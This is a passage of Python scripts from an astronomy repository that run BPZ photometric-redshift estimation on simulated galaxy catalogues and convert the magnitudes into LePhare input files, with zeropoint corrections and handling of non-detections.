The code expects input files created by extractMillenium.py\n# run as: python photozMillenium_WFI2033.py /Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images.txt\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\nroot_bpz = \"/Users/perseus/bpz-1.99.3/test/\"\nroot_original = \"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/txt/\"\nfile = str(sys.argv[1])\nos.system(\"cp %s %s\" % (file,file.replace(root_original, root_bpz)))\nif \"ugrizJHK\" in file:\n os.system(\"cp %smillennium_ugrizJHK.columns %s\" % (root_bpz,file.replace(root_original, root_bpz)[:-4]+'.columns'))\nelse:\n os.system(\"cp %smillennium_ugriz.columns %s\" % (root_bpz,file.replace(root_original, root_bpz)[:-4]+'.columns'))\n\nos.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % file.replace(root_original, root_bpz))\nos.system(\"python $BPZPATH/bpzfinalize.py %s\" % file.replace(root_original, root_bpz)[:-4])\n\nid = 0\nu = 1\nu_err = 2\ng = 3\ng_err = 4\nr = 5\nr_err = 6\ni = 7\ni_err = 8\nz = 9\nz_err = 10\nJ = 11\nJ_err = 12\nH = 13\nH_err = 14\nK = 15\nK_err = 16\n\nif \"ugrizJHK\" in file:\n data = np.loadtxt(file,usecols=[0,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],unpack=True)\n data_bpz = np.loadtxt(file.replace(root_original, root_bpz)[:-4]+\"_bpz.cat\",usecols=[9,1],unpack=True)\n ''' Write the mags into LePhare-expected format, and assuming no observations for mags below detection threshold '''\n u_corr = 0.015\n g_corr = 0.026\n r_corr = 0.029\n i_corr = 0.016\n z_corr = 0.018\n J_corr = -0.003\n H_corr = -0.005\n K_corr = -0.005\n #u_corr = 0.036\n #g_corr = 0.012\n #r_corr = 0.013\n #i_corr = -0.000\n #z_corr = -0.009\n # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n data[u_err][np.abs(data[u]) == 99.0] = -99.0\n data[g_err][np.abs(data[g]) == 99.0] = -99.0\n data[r_err][np.abs(data[r]) == 99.0] = -99.0\n data[i_err][np.abs(data[i]) == 99.0] = -99.0\n data[z_err][np.abs(data[z]) == 99.0] = -99.0\n data[J_err][np.abs(data[J]) == 99.0] = -99.0\n data[H_err][np.abs(data[H]) == 99.0] = -99.0\n data[K_err][np.abs(data[K]) == 99.0] = -99.0\n data[u][np.abs(data[u]) == 99.0] = -99.0\n data[g][np.abs(data[g]) == 99.0] = -99.0\n data[r][np.abs(data[r]) == 99.0] = -99.0\n data[i][np.abs(data[i]) == 99.0] = -99.0\n data[z][np.abs(data[z]) == 99.0] = -99.0\n data[J][np.abs(data[J]) == 99.0] = -99.0\n data[H][np.abs(data[H]) == 99.0] = -99.0\n data[K][np.abs(data[K]) == 99.0] = -99.0\n # apply the corrections suggested by BPZ\n data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n data[z][np.abs(data[z]) != 99.0] += z_corr\n data[J][np.abs(data[J]) != 99.0] += J_corr\n data[H][np.abs(data[H]) != 99.0] += H_corr\n data[K][np.abs(data[K]) != 99.0] += K_corr\n # LePhare thinks error bars = 0 means non-detection, so fix this\n data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n data[z_err][data[z_err] == 0.00] = 0.01\n data[J_err][data[J_err] == 0.00] = 0.01\n data[H_err][data[H_err] == 0.00] = 0.01\n data[K_err][data[K_err] == 0.00] = 0.01\n fileout = file[:-4] + \"_forlephare.txt\"\n str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t 
r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t specz \\t photoz\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data_bpz[0],data_bpz[1]]\n np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.3f \\t %.2f')\nelse:\n data = np.loadtxt(file,usecols=[0,7,8,9,10,11,12,13,14,15,16],unpack=True)\n data_bpz = np.loadtxt(file.replace(root_original, root_bpz)[:-4]+\"_bpz.cat\",usecols=[1],unpack=True)\n u_corr = 0.036\n g_corr = 0.012\n r_corr = 0.013\n i_corr = -0.000\n z_corr = -0.009\n # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n data[u_err][np.abs(data[u]) == 99.0] = -99.0\n data[g_err][np.abs(data[g]) == 99.0] = -99.0\n data[r_err][np.abs(data[r]) == 99.0] = -99.0\n data[i_err][np.abs(data[i]) == 99.0] = -99.0\n data[z_err][np.abs(data[z]) == 99.0] = -99.0\n data[u][np.abs(data[u]) == 99.0] = -99.0\n data[g][np.abs(data[g]) == 99.0] = -99.0\n data[r][np.abs(data[r]) == 99.0] = -99.0\n data[i][np.abs(data[i]) == 99.0] = -99.0\n data[z][np.abs(data[z]) == 99.0] = -99.0\n # apply the corrections suggested by BPZ\n data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n data[z][np.abs(data[z]) != 99.0] += z_corr\n # LePhare thinks error bars = 0 means non-detection, so fix this\n data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n data[z_err][data[z_err] == 0.00] = 0.01\n fileout = file[:-4] + \"_forlephare.txt\"\n str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t photoz\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data_bpz]\n np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\".bpz\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\".bpz.bak\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\"_bpz.cat\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\".flux_comparison\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+\".probs\"))\nos.system(\"rm %s\" % (file.replace(root_original, root_bpz)))\nif \"ugrizJHK\" in file:\n os.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+'.columns'))\nelse:\n os.system(\"rm %s\" % (file.replace(root_original, root_bpz)[:-4]+'.columns'))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n\n" }, { "alpha_fraction": 0.5305668115615845, "alphanum_fraction": 0.6059731245040894, "avg_line_length": 49.29460525512695, "blob_id": "cfdedee8827164aa06a00f31276b1b31aa21f5f8", "content_id": "088cd8e48bfcd806a9b1bd5ad3f7c847163dbb82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12121, "license_type": "no_license", "max_line_length": 433, "num_lines": 241, "path": 
"/python/catalogue_utilities/converttolephare_ugrizYJHK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to convert raw matched photometric catalogues (with matched PSFs) from BPZ-expected input into LePhare-expected input. The first part of the code accounts for non-detections but not for non-observations. The second part considers all non-detections as non-observations. This is because some non-detections would not execute.The code requires \"_withbpzeazy\" files, which include available spectroscopic information.\n##########################\n\nimport numpy as np \n\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazy.cat\"\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmags.cat\"\n#file = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazy.cat\"\nfile = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmags.cat\"\n\n# zeropoint corrections suggested by lephare:\nu_corr = +1.40\ng_corr = -0.03\nr_corr = -0.00\ni_corr = 0.00\nz_corr = -0.01\nY_corr = -0.07\nJ_corr = -0.10\nH_corr = -0.01\nK_corr = +0.06\n\n# conversion from Vega to AB; assuming that the input mags are in Vega\nJ_corr += 0.94 # computed by LePhare\nH_corr += 1.35\nK_corr += 1.83\n\nid = 8\nu = 9\nu_err = 10\ng = 11\ng_err = 12\nr = 13\nr_err = 14\ni = 15\ni_err = 16\nz = 17\nz_err = 18\nY = 19\nY_err = 20\nJ = 21\nJ_err = 22\nH = 23\nH_err = 24\nK = 25\nK_err = 26\nphotoz_bpz = 28\nphotoz_eazy = 48\nspecz = 40\n\n#irac1 = 0\n#irac1_err = 1\n#irac2 = 2\n#irac2_err = 3\n#irac3 = 4\n#irac3_err = 5\n#irac4 = 6\n#irac4_err = 7\nirac1 = 74\nirac1_err = 75\nirac2 = 76\nirac2_err = 77\nirac3 = 78\nirac3_err = 79\nirac4 = 80\nirac4_err = 81\n\ndata = np.loadtxt(file,unpack=True)\n\n# If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n#data[irac1] = -99\n#data[irac1_err] = -99\n#data[irac2] = -99\n#data[irac2_err] = -99\n#data[irac3] = -99\n#data[irac3_err] = -99\n#data[irac4] = -99\n#data[irac4_err] = -99\n\n# a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and Ideally I would fix the errors one by one through closer examination. 
Here I just replace their errors with 1 mag\ndata[u_err][np.abs(data[u_err]) == 99.00] = 1.00\ndata[g_err][np.abs(data[g_err]) == 99.00] = 1.00\ndata[r_err][np.abs(data[r_err]) == 99.00] = 1.00\ndata[i_err][np.abs(data[i_err]) == 99.00] = 1.00\ndata[z_err][np.abs(data[z_err]) == 99.00] = 1.00\ndata[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\ndata[J_err][np.abs(data[J_err]) == 99.00] = 1.00\ndata[H_err][np.abs(data[H_err]) == 99.00] = 1.00\ndata[K_err][np.abs(data[K_err]) == 99.00] = 1.00\n\n# use photoz where specz is unavailable, or for stars\ndata[photoz_bpz][data[specz] > 0] = data[specz][data[specz] > 0]\ndata[photoz_eazy][data[specz] > 0] = data[specz][data[specz] > 0]\n\n# apply the corrections\ndata[u][np.abs(data[u]) != 99.0] += u_corr\ndata[g][np.abs(data[g]) != 99.0] += g_corr\ndata[r][np.abs(data[r]) != 99.0] += r_corr\ndata[i][np.abs(data[i]) != 99.0] += i_corr\ndata[z][np.abs(data[z]) != 99.0] += z_corr\ndata[Y][np.abs(data[Y]) != 99.0] += Y_corr\ndata[J][np.abs(data[J]) != 99.0] += J_corr\ndata[H][np.abs(data[H]) != 99.0] += H_corr\ndata[K][np.abs(data[K]) != 99.0] += K_corr\n\n# correct the limiting mags\ndata[u_err][np.abs(data[u]) == 99.0] += u_corr\ndata[g_err][np.abs(data[g]) == 99.0] += g_corr\ndata[r_err][np.abs(data[r]) == 99.0] += r_corr\ndata[i_err][np.abs(data[i]) == 99.0] += i_corr\ndata[z_err][np.abs(data[z]) == 99.0] += z_corr\ndata[Y_err][np.abs(data[Y]) == 99.0] += Y_corr\ndata[J_err][np.abs(data[J]) == 99.0] += J_corr\ndata[H_err][np.abs(data[H]) == 99.0] += H_corr\ndata[K_err][np.abs(data[K]) == 99.0] += K_corr\n\n# the format for nondetections is error=-1.0 and magnitude at 1-sigma\ndata[u][np.abs(data[u]) == 99.0] = data[u_err][np.abs(data[u]) == 99.0]\ndata[g][np.abs(data[g]) == 99.0] = data[g_err][np.abs(data[g]) == 99.0]\ndata[r][np.abs(data[r]) == 99.0] = data[r_err][np.abs(data[r]) == 99.0]\ndata[i][np.abs(data[i]) == 99.0] = data[i_err][np.abs(data[i]) == 99.0]\ndata[z][np.abs(data[z]) == 99.0] = data[z_err][np.abs(data[z]) == 99.0]\ndata[Y][np.abs(data[Y]) == 99.0] = data[Y_err][np.abs(data[Y]) == 99.0]\ndata[J][np.abs(data[J]) == 99.0] = data[J_err][np.abs(data[J]) == 99.0]\ndata[H][np.abs(data[H]) == 99.0] = data[H_err][np.abs(data[H]) == 99.0]\ndata[K][np.abs(data[K]) == 99.0] = data[K_err][np.abs(data[K]) == 99.0]\ndata[u_err][np.abs(data[u_err]) > 20] = -1.0\ndata[g_err][np.abs(data[g_err]) > 20] = -1.0\ndata[r_err][np.abs(data[r_err]) > 20] = -1.0\ndata[i_err][np.abs(data[i_err]) > 20] = -1.0\ndata[z_err][np.abs(data[z_err]) > 20] = -1.0\ndata[Y_err][np.abs(data[Y_err]) > 20] = -1.0\ndata[J_err][np.abs(data[J_err]) > 20] = -1.0\ndata[H_err][np.abs(data[H_err]) > 20] = -1.0\ndata[K_err][np.abs(data[K_err]) > 20] = -1.0\n\n# LePhare thinks error bars = 0 means non-detection, so fix this\ndata[u_err][data[u_err] == 0.00] = 0.01\ndata[g_err][data[g_err] == 0.00] = 0.01\ndata[r_err][data[r_err] == 0.00] = 0.01\ndata[i_err][data[i_err] == 0.00] = 0.01\ndata[z_err][data[z_err] == 0.00] = 0.01\ndata[Y_err][data[Y_err] == 0.00] = 0.01\ndata[J_err][data[J_err] == 0.00] = 0.01\ndata[H_err][data[H_err] == 0.00] = 0.01\ndata[K_err][data[K_err] == 0.00] = 0.01\n\n#fileout = file[:-16] + \"_forlepharewithbpz.cat\"\nfileout = file[:-4] + \"_forlepharewithbpzIRAC.cat\"\nstr = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\ndataout = 
np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[photoz_bpz]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n#fileout = file[:-16] + \"_forlepharewitheazy.cat\"\nfileout = file[:-4] + \"_forlepharewitheazyIRAC.cat\"\nstr = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[photoz_eazy]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n##########################\n# The code is used to convert raw matched photometric catalogues (with matched PSFs) from BPZ-expected input into LePhare-expected input. It considers all non-detections as non-observations. This is because some non-detections would not execute.\n##########################\n\ndata = np.loadtxt(file,unpack=True)\n\n# a small number of objects in BPZ have good mags, but error on the mag 99; those objects should be good, and ideally I would fix the errors one by one through closer examination. 
Here I just replace their errors with 1 mag\ndata[u_err][np.abs(data[u_err]) == 99.00] = 1.00\ndata[g_err][np.abs(data[g_err]) == 99.00] = 1.00\ndata[r_err][np.abs(data[r_err]) == 99.00] = 1.00\ndata[i_err][np.abs(data[i_err]) == 99.00] = 1.00\ndata[z_err][np.abs(data[z_err]) == 99.00] = 1.00\ndata[Y_err][np.abs(data[Y_err]) == 99.00] = 1.00\ndata[J_err][np.abs(data[J_err]) == 99.00] = 1.00\ndata[H_err][np.abs(data[H_err]) == 99.00] = 1.00\ndata[K_err][np.abs(data[K_err]) == 99.00] = 1.00\n\n# If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n#data[irac1] = -99\n#data[irac1_err] = -99\n#data[irac2] = -99\n#data[irac2_err] = -99\n#data[irac3] = -99\n#data[irac3_err] = -99\n#data[irac4] = -99\n#data[irac4_err] = -99\ndata[u_err][np.abs(data[u]) == 99.0] = -99.0\ndata[g_err][np.abs(data[g]) == 99.0] = -99.0\ndata[r_err][np.abs(data[r]) == 99.0] = -99.0\ndata[i_err][np.abs(data[i]) == 99.0] = -99.0\ndata[z_err][np.abs(data[z]) == 99.0] = -99.0\ndata[Y_err][np.abs(data[Y]) == 99.0] = -99.0\ndata[J_err][np.abs(data[J]) == 99.0] = -99.0\ndata[H_err][np.abs(data[H]) == 99.0] = -99.0\ndata[K_err][np.abs(data[K]) == 99.0] = -99.0\ndata[u][np.abs(data[u]) == 99.0] = -99.0\ndata[g][np.abs(data[g]) == 99.0] = -99.0\ndata[r][np.abs(data[r]) == 99.0] = -99.0\ndata[i][np.abs(data[i]) == 99.0] = -99.0\ndata[z][np.abs(data[z]) == 99.0] = -99.0\ndata[Y][np.abs(data[Y]) == 99.0] = -99.0\ndata[J][np.abs(data[J]) == 99.0] = -99.0\ndata[H][np.abs(data[H]) == 99.0] = -99.0\ndata[K][np.abs(data[K]) == 99.0] = -99.0\n\n# use photoz where specz is unavailable, or for stars\ndata[photoz_bpz][data[specz] > 0] = data[specz][data[specz] > 0]\ndata[photoz_eazy][data[specz] > 0] = data[specz][data[specz] > 0]\n\n# apply the corrections\ndata[u][np.abs(data[u]) != 99.0] += u_corr\ndata[g][np.abs(data[g]) != 99.0] += g_corr\ndata[r][np.abs(data[r]) != 99.0] += r_corr\ndata[i][np.abs(data[i]) != 99.0] += i_corr\ndata[z][np.abs(data[z]) != 99.0] += z_corr\ndata[Y][np.abs(data[Y]) != 99.0] += Y_corr\ndata[J][np.abs(data[J]) != 99.0] += J_corr\ndata[H][np.abs(data[H]) != 99.0] += H_corr\ndata[K][np.abs(data[K]) != 99.0] += K_corr\n\n# LePhare thinks error bars = 0 means non-detection, so fix this\ndata[u_err][data[u_err] == 0.00] = 0.01\ndata[g_err][data[g_err] == 0.00] = 0.01\ndata[r_err][data[r_err] == 0.00] = 0.01\ndata[i_err][data[i_err] == 0.00] = 0.01\ndata[z_err][data[z_err] == 0.00] = 0.01\ndata[Y_err][data[Y_err] == 0.00] = 0.01\ndata[J_err][data[J_err] == 0.00] = 0.01\ndata[H_err][data[H_err] == 0.00] = 0.01\ndata[K_err][data[K_err] == 0.00] = 0.01\n\n#fileout = file[:-16] + \"_forlepharewithbpz_noobs.cat\"\nfileout = file[:-4] + \"_forlepharewithbpzIRAC_noobs.cat\"\nstr = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[photoz_bpz]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 
%.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n\n#fileout = file[:-16] + \"_forlepharewitheazy_noobs.cat\"\nfileout = file[:-4] + \"_forlepharewitheazyIRAC_noobs.cat\"\nstr = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t Y \\t Y_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t ch1 \\t ch1_err \\t ch2 \\t ch2_err \\t ch3 \\t ch3_err \\t ch4 \\t ch4_err \\t context z-spec \\t string\"\ndataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[Y],data[Y_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[irac1],data[irac1_err],data[irac2],data[irac2_err],data[irac3],data[irac3_err],data[irac4],data[irac4_err],data[photoz_eazy]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 8191 \\t %.4f ')\n" }, { "alpha_fraction": 0.543608546257019, "alphanum_fraction": 0.610519289970398, "avg_line_length": 45.9375, "blob_id": "e13613930d1a2cfd6979bf1401f195d417311f45", "content_id": "88767eecf580e29730fefa170aa51825fbb2e2ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6008, "license_type": "no_license", "max_line_length": 283, "num_lines": 128, "path": "/python/catalogue_utilities/photozMillennium.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code calculates realistic BPZ photoz for galaxies in the Millennium Simulation. It then creates the necessary files to run LePhare on SLAC. 
The code expects input files created by extractMillenium.py\n# run as: python photozMillennium.py GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_J1206.images.txt\n# or python photozMillennium.py GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxi_griz.images.txt\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\n# grep -v 99.00 GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_J1206.images.txt > GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_J1206noupperlimits.images.txt # this is for the case when I am calibrating the zpt, so I should not use upper limits\nroot_bpz = \"/Users/cerusu/bpz-1.99.3/test/\"\nroot_original = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/0408_SA_gal_sampledphot/\"\n#root_original = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/0408_Henriques_gal_sampledphot/\"\nfile = str(sys.argv[1])\n\nif \"Henriques\" in root_original: # this is because when I created the files the first line was filled with zeros\n file1 = root_original+file\n file1_ = root_original+file+\"_\"\n os.system(\"sed \\'2d\\' %s > %s\" %(file1,file1_))\n os.system(\"mv %s %s\" %(file1_,file1))\n os.system(\"rm %s\" %file1_)\n\nfile1 = root_bpz+file[:-4]+'.cat'\nos.system(\"cp %s %s\" % (root_original+file,file1))\n#if \"griK\" in file: os.system(\"cp %smillennium_griK.columns %s\" % (root_bpz,file1[:-4]+'.columns'))\nif \"griz\" in file: os.system(\"cp %smillennium_griz.columns %s\" % (root_bpz,file1[:-4]+'.columns'))\n\nos.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % file1)\n#os.system(\"python $BPZPATH/bpz.py %s -INTERP 2 -ONLY_TYPE yes\" % file1)\nos.system(\"python $BPZPATH/bpzfinalize.py %s\" % file1[:-4])\n\nid = 0\n#u = 1\n#u_err = 2\ng = 1\ng_err = 2\nr = 3\nr_err = 4\ni = 5\ni_err = 6\nz = 7\nz_err = 8\n#J = 11\n#J_err = 12\n#H = 13\n#H_err = 14\n#K = 7\n#K_err = 8\n\nif \"griK\" in file:\n data = np.loadtxt(root_original+file,usecols=[0,7,8,9,10,11,12,13,14],unpack=True) # ID + mags\n data_bpz = np.loadtxt(file1[:-4]+\"_bpz.cat\",usecols=[9,1],unpack=True)\n ''' Write the mags into LePhare-expected format, and assuming no observations for mags below detection threshold '''\n #u_corr = 0.0 # for griK these are the offsets suggested by running BPZ on one simulation field; scaled so that I apply the same i-band offset as for ugrizJHK\n g_corr = 0.010\n r_corr = 0.010\n i_corr = 0.016\n #z_corr = 0.0\n #J_corr = 0.0\n #H_corr = 0.0\n K_corr = -0.012\n # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n #data[u_err] = -99.0\n data[g_err][np.abs(data[g]) == 99.0] = -99.0\n data[r_err][np.abs(data[r]) == 99.0] = -99.0\n data[i_err][np.abs(data[i]) == 99.0] = -99.0\n #data[z_err] = -99.0\n #data[J_err] = -99.0\n #data[H_err] = -99.0\n data[K_err][np.abs(data[K]) == 99.0] = -99.0\n #data[u] = -99.0\n data[g][np.abs(data[g]) == 99.0] = -99.0\n data[r][np.abs(data[r]) == 99.0] = -99.0\n data[i][np.abs(data[i]) == 99.0] = -99.0\n #data[z] = -99.0\n #data[J] = -99.0\n #data[H] = -99.0\n data[K][np.abs(data[K]) == 99.0] = -99.0\n # apply the corrections suggested by BPZ\n #data[u][np.abs(data[u]) != 99.0] += u_corr\n data[g][np.abs(data[g]) != 99.0] += g_corr\n data[r][np.abs(data[r]) != 99.0] += r_corr\n data[i][np.abs(data[i]) != 99.0] += i_corr\n #data[z][np.abs(data[z]) != 99.0] += z_corr\n #data[J][np.abs(data[J]) != 99.0] += J_corr\n #data[H][np.abs(data[H]) != 99.0] += H_corr\n data[K][np.abs(data[K]) 
!= 99.0] += K_corr\n # LePhare thinks error bars = 0 means non-detection, so fix this\n #data[u_err][data[u_err] == 0.00] = 0.01\n data[g_err][data[g_err] == 0.00] = 0.01\n data[r_err][data[r_err] == 0.00] = 0.01\n data[i_err][data[i_err] == 0.00] = 0.01\n #data[z_err][data[z_err] == 0.00] = 0.01\n #data[J_err][data[J_err] == 0.00] = 0.01\n #data[H_err][data[H_err] == 0.00] = 0.01\n data[K_err][data[K_err] == 0.00] = 0.01\n fileout = root_original + file[:-4] + \"_forlephare.txt\"\n #str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t K \\t K_err \\t specz \\t photoz\"\n str = \"ID \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t K \\t K_err \\t specz \\t photoz\"\n dataout = np.c_[data[id],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[K],data[K_err],data_bpz[0],data_bpz[1]]\n #np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.3f \\t %.2f')\n\n# If I don't require to use Lephare\n#data = np.loadtxt(root_original+file,usecols=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],unpack=True) # ID + mags\ndata = np.loadtxt(root_original+file,usecols=[0,1,2,3,8],unpack=True) # ID + mags\ndata_bpz = np.loadtxt(file1[:-4]+\"_bpz.cat\",usecols=[1],unpack=True)\nfileout = root_original + file[:-4] + \"_forNAOJ.txt\"\n#str = \"GalID \\t z_spec \\t pos0 \\t pos_1 \\t M_Halo \\t M_Stellar \\t mag_SDSS_iorig \\t mag_SDSS_i \\t photoz\"\nstr = \"GalID \\t z_spec \\t pos0 \\t pos_1 \\t mag_SDSS_i \\t photoz\"\n#dataout = np.c_[data[0],data[1],data[2],data[3],data[4],data[5],data[6],data[11],data_bpz]\n#np.savetxt(fileout,dataout,header=str,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.3e \\t %.3e \\t %.2f \\t %.2f \\t %.2f')\ndataout = 